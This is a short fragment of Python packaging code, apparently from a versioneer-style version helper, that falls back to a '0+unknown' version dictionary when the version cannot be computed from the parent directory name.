return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
except NotThisMethod:
pass
return {"version": "0+unknown", "full-revisionid": None,
"dirty": None,
"error": "unable to compute version", "date": None}
|